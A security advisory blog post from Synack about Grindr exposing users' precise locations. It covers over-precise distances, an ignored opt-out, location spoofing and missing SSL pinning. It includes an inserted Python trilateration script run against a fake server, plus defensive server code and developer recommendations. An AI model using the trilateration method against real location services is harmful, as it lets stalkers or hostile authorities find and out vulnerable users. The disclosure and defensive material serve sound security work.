September 5, 2014 | 12 Min. Read

The Do’s and Don’ts of Location Aware Apps; A Case Study

Updated 9/5/2014 9pm PT; updated 9/11/2014 2pm PT

Synack initially reported two information disclosure vulnerabilities to Grindr in March 2014. On August 16, 2014, exploit details for one of the two were published on Pastebin by an anonymous individual who had independently identified the vulnerability in the Grindr app. The other vulnerability has been silently patched by Grindr. During Synack’s research, several other issues were uncovered that are not vulnerabilities but have security implications. As the unpatched vulnerability is now public, and there are unconfirmed reports of gay individuals being identified by the Egyptian police using it, Synack is publishing a Security Advisory to ensure Grindr users are fully informed of the risk and of the impact of this issue on their privacy and physical safety.

(background)

At Synack we are always eager to dig into new and popular technology and see what exactly makes it tick. Moreover, as we are in the arena of cyber security, the security of websites, mobile apps, and networks is always on our minds.

The recent adoption of location aware devices has given rise to countless mobile apps that leverage geolocation data for a richer user experience. One of the more interesting uses for location awareness is to help people connect and meet in ways they never have before.  But at what cost does this convenience come?

Mobile dating platforms seemed like a good place to start investigating. Sparked by a friend’s discovery of the “greatest new app ever”, we began by examining Tinder, and what we found was somewhat startling. Users’ exact GPS coordinates were being broadcast, and supposedly anonymous data could easily be correlated to Facebook accounts. In other words, Tinder was basically a stalker’s dream. Around the same time, other security researchers found the same vulnerabilities and Tinder quickly patched the bug(s). Several good writeups emerged on the topic (see http://time.com/8604/tinder-app-user-location-security-flaw/).

(grindr)

With Tinder patched, we wondered what other dating services are heavily location aware and possibly insecure. Several of our friends suggested we take a look at Grindr, the premier dating application for gay men. The app is actively used by millions of people worldwide, and due to the potentially sensitive nature of the user base it seemed interesting for a security audit. Although Grindr was previously audited (https://www.os3.nl/_media/reports/grindr.pdf) and a range of vulnerabilities were discovered, we do not feel location sharing was adequately discussed.

Figure 1. The Grindr App

(vulnerabilities)

One of Grindr’s core features and keys to its appeal is allowing a user to view how far away they are from other users. Unfortunately, this distance information is provided in an incredibly precise manner, down to the sub-foot (or possibly even centimeter) level. But just knowing the distance you are away from someone isn’t a privacy problem, right?  We think it is, since this can reveal users’ patterns of life and ultimately unmask their identities.

First, let’s take a look at the data passed between our instance of the Grindr app and the Grindr servers:

 

{"status": 1, "distance": 0.861290174942267, "relationshipStatus": 1, "displayName": "John Doe", "isFavorite": false, "weight": 83914.5859375, "bodyType": 4, "showDistance": false, "height": 187.960006713867, "headlineDate": 1387233218000, "version": 1387233224, "seen": 1391205348000, "profileId": 12345678, "showAge": true, "ethnicity": 7, "profileImageMediaHash": "abcdef1234567890fedcba0987654321abcdefgh"}

This is a JSON blob describing a user close to us. Notice how precisely the distance is provided: it is given in kilometers with fifteen significant digits, which translates to (sub-)centimeter precision, far finer than any phone GPS fix. Also notice the “showDistance” key. This key tells the Grindr app whether it should display this user’s distance to the viewer. We discovered that while the app respects this flag in the phone’s UI, the server still returned the user’s distance even when they had chosen not to share it.

To succinctly summarize our initial findings:

1) Grindr shares location-based data about its users at an incredibly high level of precision (<1 ft). Any user, or anonymous attacker, can directly query the server to gain access to this data. Moreover, by spoofing locations, an attacker can gather information about any and all users in any location.

2) Although the Grindr app provided a means for a user to disable location-based sharing, this setting was only respected in the app’s user interface. The user’s location was still transmitted to Grindr’s server, and thus retrievable by anyone (by means of issue #1).

Synack researchers also uncovered additional issues that may have security implications. While these are not vulnerabilities, in conjunction with the first vulnerability above they may further undermine the privacy of the Grindr users.

The first issue is somewhat similar to the first vulnerability, but instead of a relative distance, the user’s exact location is reported to Grindr’s servers. Specifically, the app makes a POST request to the /nearbyProfiles endpoint with the user’s exact latitude and longitude:

{"lat": <user's latitude>, "lon": <user's longitude>, "filter": {"page": 1, "quantity": 50}}

It is important to note that this information is not directly shared with other users; however, it can be extrapolated from relative distance data points (see vulnerability #1).

While sharing one’s location is essential to the functionality of the app (and is done over SSL), reporting this data at such a high level of precision to a third party (i.e. Grindr) may be a privacy concern. This concern is compounded by another issue: the iOS Grindr app does not pin SSL certificates. SSL pinning is an extra layer of security that ensures a client will only communicate with a well-defined set of servers, by accepting only a known certificate or public key rather than anything signed by one of the device’s trusted roots. Since the Grindr iOS app does not use SSL pinning, a man-in-the-middle attack could theoretically occur. If an attacker has a compromised root certificate, or can coerce a user into installing a certificate (say by emailing it to the user as an attachment), the connection can be hijacked and the user’s exact location revealed.

Before we jump into further discussion of the vulnerabilities, it should be pointed out that they were discovered and reported to Grindr in March 2014; this blog post and Synack Security Advisory SSRA-2014-001 are only being published now because of the public disclosure of the first vulnerability, for which no fix is available at this time. The second issue was fixed after several months; Grindr now fully respects a user’s request not to share their location. However, the initial problem (the precision of the shared distance data) is still present, and a public statement by Grindr indicates this is by design. As this Grindr vulnerability is now publicly known, we believe consumers need to be fully informed of the risk of sharing their location with mobile applications; our further analysis will hopefully highlight the impact of poorly handled location services and provide insight into how to securely develop a location-enabled application.

 

(analysis)

First, a little theory. Trilateration (http://en.wikipedia.org/wiki/Trilateration) determines the position of a point given its distances from three known reference points: each distance defines a circle around its reference point, two circles intersect in at most two candidate positions, and the third circle picks out the correct one. What does this mean? Simply, if we know a user’s distance from three different places, we can calculate their precise location. Can we get that information?

Figure 2. Trilateration

With a little more reverse engineering, we can document Grindr’s full API. Analysis revealed that we are in fact able to “spoof” our location to the Grindr servers by simply passing arbitrary coordinates to the “location” API endpoint. Furthermore, due to a lack of API rate limiting, we can do this as many times as we want, as fast as we want, for any location that we want.

Let’s try this out. By calling the “nearbyProfiles” and/or “favoriteProfiles” API functions, we can retrieve a list of users together with their distances from our (claimed) position. If we spoof our location three times and retrieve the user list after each change, we have three distances for every user in range, which is all the information we need to locate any and all users on the Grindr platform in a very precise manner. Does it work? Yes.
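The following is an added worked example of the attack just described; it is not Synack’s tooling or Grindr’s code. It assumes exactly what the text states: the attacker can report arbitrary coordinates as their own position, and the server answers with a full-precision great-circle distance (in km) to every nearby profile. The real API calls are replaced by a constructed in-memory stand-in (FakeLocationServer) so the script runs offline; the target position, the spoofed observer positions and the profile id are made up.

```python
"""Trilaterating a user from precise relative distances (added example).

Assumes: attacker can spoof its own position, server replies with exact
distances.  FakeLocationServer is a constructed stand-in for the API.
"""
import math

EARTH_RADIUS_KM = 6371.0088


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two points (degrees)."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


class FakeLocationServer:
    """Constructed stand-in for the nearbyProfiles endpoint: it stores each
    user's exact position and replies with full-precision distances, like
    the JSON blob shown earlier."""

    def __init__(self, users):
        self.users = dict(users)  # profileId -> (lat, lon)

    def nearby_profiles(self, lat, lon):
        return [{"profileId": pid, "distance": haversine_km(lat, lon, ulat, ulon)}
                for pid, (ulat, ulon) in self.users.items()]


def to_local_xy(lat, lon, lat0, lon0):
    """Project (lat, lon) onto a flat plane (km) tangent at (lat0, lon0).
    Accurate to well under a metre over the few-kilometre ranges used here."""
    x = math.radians(lon - lon0) * EARTH_RADIUS_KM * math.cos(math.radians(lat0))
    y = math.radians(lat - lat0) * EARTH_RADIUS_KM
    return x, y


def from_local_xy(x, y, lat0, lon0):
    """Inverse of to_local_xy."""
    lat = lat0 + math.degrees(y / EARTH_RADIUS_KM)
    lon = lon0 + math.degrees(x / (EARTH_RADIUS_KM * math.cos(math.radians(lat0))))
    return lat, lon


def trilaterate(observations):
    """observations: three (lat, lon, distance_km) tuples, each an attacker
    position and the distance the server reported from it.

    Circle i is (x - xi)^2 + (y - yi)^2 = ri^2.  Subtracting circle 1 from
    circles 2 and 3 cancels the quadratic terms and leaves two linear
    equations in (x, y), solved here by Cramer's rule."""
    (la1, lo1, r1), (la2, lo2, r2), (la3, lo3, r3) = observations
    x1, y1 = 0.0, 0.0                      # plane is centred on observer 1
    x2, y2 = to_local_xy(la2, lo2, la1, lo1)
    x3, y3 = to_local_xy(la3, lo3, la1, lo1)
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1 ** 2 - r2 ** 2 + x2 ** 2 + y2 ** 2 - x1 ** 2 - y1 ** 2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1 ** 2 - r3 ** 2 + x3 ** 2 + y3 ** 2 - x1 ** 2 - y1 ** 2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("observer positions are collinear; choose a third point off the line")
    x = (c1 * b2 - c2 * b1) / det
    y = (a1 * c2 - a2 * c1) / det
    return from_local_xy(x, y, la1, lo1)


def locate_user(server, profile_id, spoofed_points):
    """Spoof three positions, harvest the distance to profile_id from each
    reply, and trilaterate.  Against the real API each spoof would be a
    request to the location endpoint followed by a nearbyProfiles call."""
    observations = []
    for lat, lon in spoofed_points:
        reply = server.nearby_profiles(lat, lon)
        distance = next(p["distance"] for p in reply if p["profileId"] == profile_id)
        observations.append((lat, lon, distance))
    return trilaterate(observations)


if __name__ == "__main__":
    # Constructed data: one target somewhere in San Francisco and three
    # spoofed attacker positions roughly a kilometre away from it.
    true_position = (37.7749, -122.4194)
    server = FakeLocationServer({12345678: true_position})
    spoofed = [(37.7800, -122.4300), (37.7700, -122.4100), (37.7850, -122.4100)]
    estimate = locate_user(server, 12345678, spoofed)
    error_m = haversine_km(*true_position, *estimate) * 1000
    print(f"estimated position {estimate}, error {error_m:.2f} m")
```

With the server returning exact distances, the estimate lands within a metre of the target; the residual error comes only from the flat-plane projection. The three spoofed points must not lie on a line, otherwise the two linear equations are dependent and the position is ambiguous, which the solver reports rather than silently returning garbage.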

Figure 3. San Francisco Grindr Users

Here you can see a map of every Grindr user in San Francisco (early January 2014).

It should be clear now that the combination of sharing a user’s distance regardless of their consent, and providing accurate location data is a fairly serious privacy concern. In fact, these vulnerabilities have mass user privacy implications and can ultimately reveal the identity and home addresses of Grindr users.

It’s clear that this is an issue, but is there anything else to be worried about? What if someone were to monitor users’ locations over time? Using this basic location functionality, we tracked willing test participants in the Bay Area for two weeks.

As days passed, patterns in users’ locations started to emerge. People are creatures of habit: work in the morning, gym in the afternoon, home in the evening, repeated five days a week. All the information needed to determine our participants’ patterns of life was being streamed right to us. With only home and work locations, it was possible to determine nearly every user’s true identity.

Figure 4. Individual user tracking

Now what if someone had more malicious, targeted, blackmail interests in mind? Is it possible to monitor a specific location? Unfortunately, due to the ability to spoof one’s location, Grindr happily obliges. To illustrate the seriousness of this vulnerability, we queried the Grindr servers for users at various locations such as US Capitols and the Sochi Olympics.

Figure 5. Grindr users at the Sochi Olympics

IMPORTANT NOTE: No attempt was made to correlate any identities within these locations, in the interest of protecting the privacy of those individuals. All data logged has been irrecoverably destroyed. The purpose of this blog is not to out anyone, but to help protect those who wish to remain private.

 

(developer recommendations)

While this is only a case study of one particular application, our observations have shown that countless other applications suffer from very similar flaws. Our recommendations for building a robust and secure location-aware application, in the interest of protecting end users:

  • Rounding error should be introduced into location data (or the distances derived from it) to add an element of uncertainty to a user’s position. Note that deterministic rounding on its own can still be probed from many spoofed positions, so it should be combined with the limits below.
  • A user’s location data should not be transmitted at all if they have opted out of sharing.
  • APIs should rate limit requests in order to make large-scale data harvesting difficult.
  • APIs should limit the speed and magnitude of a user’s location changes to prevent harvesting of distances from arbitrary points.
  • Server and client SSL certificates should be implemented, pinned, and validation enforced, in order to make reverse engineering and attacking more difficult.
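As an added illustration of the first four recommendations (this is example code, not Grindr’s server or anything Synack audited), the small service below coarsens every distance it reports, omits the distance entirely for users who opted out, rate limits location updates with a token bucket, and rejects updates that imply an impossible travel speed. The thresholds (300 km/h, 60 updates per hour, 500 m buckets), the class and method names, and the in-memory store are all assumptions chosen for the example.

```python
"""Server-side location handling following the recommendations above
(added example, not Grindr's code).  Thresholds are assumptions."""
import math
import time

EARTH_RADIUS_KM = 6371.0088
MAX_SPEED_KMH = 300.0          # assumed: faster than any plausible ground travel
MAX_UPDATES_PER_HOUR = 60      # assumed token-bucket capacity and refill rate
DISTANCE_BUCKET_KM = 0.5       # assumed: never report finer than 500 m


def approx_distance_km(lat1, lon1, lat2, lon2):
    """Equirectangular approximation of distance; adequate for plausibility
    checks and for the coarse distances we are willing to report."""
    x = math.radians(lon2 - lon1) * math.cos(math.radians((lat1 + lat2) / 2))
    y = math.radians(lat2 - lat1)
    return EARTH_RADIUS_KM * math.hypot(x, y)


def coarsen_distance(distance_km, bucket_km=DISTANCE_BUCKET_KM):
    """Round a distance up to the next bucket boundary.  The client only
    learns "within N km", so three queries bound the user to a region
    rather than a point; the residual uncertainty is bucket_km."""
    return math.ceil(distance_km / bucket_km) * bucket_km


class LocationService:
    def __init__(self, now=time.time):
        self.now = now      # injectable clock so the logic can be tested offline
        self.state = {}     # user_id -> {lat, lon, ts, share, tokens, token_ts}

    def update_location(self, user_id, lat, lon, share_distance=True):
        """Accept or reject a location report.  Returns "ok", "rate_limited"
        or "implausible_jump"."""
        t = self.now()
        s = self.state.setdefault(
            user_id, {"tokens": float(MAX_UPDATES_PER_HOUR), "token_ts": t})
        # Token bucket: refill continuously, capped at the bucket size.
        refill = (t - s["token_ts"]) * MAX_UPDATES_PER_HOUR / 3600.0
        s["tokens"] = min(float(MAX_UPDATES_PER_HOUR), s["tokens"] + refill)
        s["token_ts"] = t
        if s["tokens"] < 1.0:
            return "rate_limited"
        s["tokens"] -= 1.0
        # Speed check: nobody is in San Francisco and Cairo a minute apart.
        if "lat" in s:
            hours = max((t - s["ts"]) / 3600.0, 1e-9)
            speed_kmh = approx_distance_km(s["lat"], s["lon"], lat, lon) / hours
            if speed_kmh > MAX_SPEED_KMH:
                return "implausible_jump"
        s.update(lat=lat, lon=lon, ts=t, share=share_distance)
        return "ok"

    def nearby_profiles(self, viewer_id):
        """Distances are coarsened, and omitted entirely for users who opted
        out: the server never sends what the UI is expected to hide."""
        viewer = self.state[viewer_id]
        result = []
        for uid, s in self.state.items():
            if uid == viewer_id or "lat" not in s:
                continue
            entry = {"profileId": uid, "showDistance": s["share"]}
            if s["share"]:
                exact = approx_distance_km(viewer["lat"], viewer["lon"], s["lat"], s["lon"])
                entry["distance"] = coarsen_distance(exact)
            result.append(entry)
        return result


if __name__ == "__main__":
    # Constructed scenario: two users in San Francisco, then an attempted
    # jump to Cairo one minute later.
    clock = [0.0]
    svc = LocationService(now=lambda: clock[0])
    print(svc.update_location(1, 37.7749, -122.4194))                       # ok
    print(svc.update_location(2, 37.7700, -122.4100, share_distance=False))  # ok
    clock[0] += 60
    print(svc.update_location(1, 30.0599, 31.2620))                         # implausible_jump
    print(svc.nearby_profiles(1))
```

Coarsening by itself is not enough: an attacker who can spoof freely can search for the position at which the reported bucket flips, and that boundary reveals the distance far more precisely than the bucket size suggests. That is why the speed and rate limits are enforced alongside it, and why opted-out users get no distance field at all rather than a flag the client is trusted to honour.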

Update – 9/5/2014 9pm PT:

Following the release of Synack’s advisory, Grindr released a security blog (http://grindr.com/blog/grindrs-location-security-update) detailing new security measures and fixes they have implemented to address “security allegations surrounding location data”.

Most notably they claim that, “Grindr is taking proactive measures to keep users safe in territories with a history of violence against the gay community. Any user who connects to Grindr in these countries will have their distance hidden automatically by default, which include Russia, Egypt…”

As it is important to verify the effectiveness of security fixes, our researchers have re-evaluated the Grindr app to check that customers are in fact protected, and so that we could update our published recommendations. What we discovered:

Fixed: Unauthorized users can no longer access relative distance information about other users (via the /nearbyProfiles API).

But… While this is a step in the right direction, anyone can create an account, even with a fake email address, as Grindr does not verify it. Once an account is created, relative distance information is gladly shared.

NOT FIXED AS CLAIMED: Grindr claims that distances are now hidden “in territories with a history of violence against the gay community”. However, testing (performed after the release of Grindr’s response) still returned precise relative distance information in ‘unsafe’ countries. Specifically, we spoofed our location to Egypt (Cairo, @30.0599153,31.2620199), and as the following screenshots show, precise distances were still returned:
Figure 1; Spoofing location of Egypt (Cairo, @30.0599153,31.2620199)

Figure 2; Precise distance reporting in Egypt

Not addressed: Relative distance information is still shared at an incredibly high level of precision (e.g. 14 decimal places). In our opinion, this is a security and privacy issue.

Not addressed: The user’s precise location is still always shared with Grindr, even if the ‘show distance’ setting is turned off. Again, while this is needed for the app to be useful, reporting this data at such a high level of precision to a third party may be a privacy concern for certain users.

Not addressed: Authorized users (i.e. anybody with a Grindr account) can easily spoof their location. This allows an attacker to locate users via trilateration. Grindr appears to take no action when far-flung locations are submitted in client requests.

Not addressed: The Grindr app still does not make use of SSL pinning. This could theoretically allow a sophisticated attacker (who possesses a certificate the device trusts) to man-in-the-middle the connection and ascertain the user’s exact location.

Update – 9/11/2014 2pm PT:

On September 5, Grindr issued a public announcement reversing its previous position and announcing a fix for this vulnerability. The Synack Research team re-tested the Grindr app and was still able to precisely locate Grindr users in Egypt, which we reported in an update to our original technical case study. Synack’s Director of Research, Patrick Wardle, spoofed his location to Cairo, Egypt and captured what the Grindr APIs report, which an attacker can obtain by sniffing his/her own network traffic or by communicating directly with the Grindr APIs via script. It is reasonable to believe that law enforcement agencies would have the technical capability to do this as well, and would not rely solely on the application’s user interface on a mobile device.

When the Synack Research team tested the Grindr app again on September 9, it appeared that Grindr had fixed the API so that all accounts have “showDistance”:false in countries with anti-gay legislation, such as Egypt and Russia. However, Grindr has not addressed the real-time tracking of users down to the centimeter in other countries such as the United States. As a result, the original vulnerability identified by Colby Moore of Synack Research has not been comprehensively addressed: an attacker can still track a Grindr user in real time from home, to the gym, to their job, out in the evening, etc., and determine patterns in their behavior.

Conclusion:

Our recommendations from SSRA-2014-001 remain unchanged.
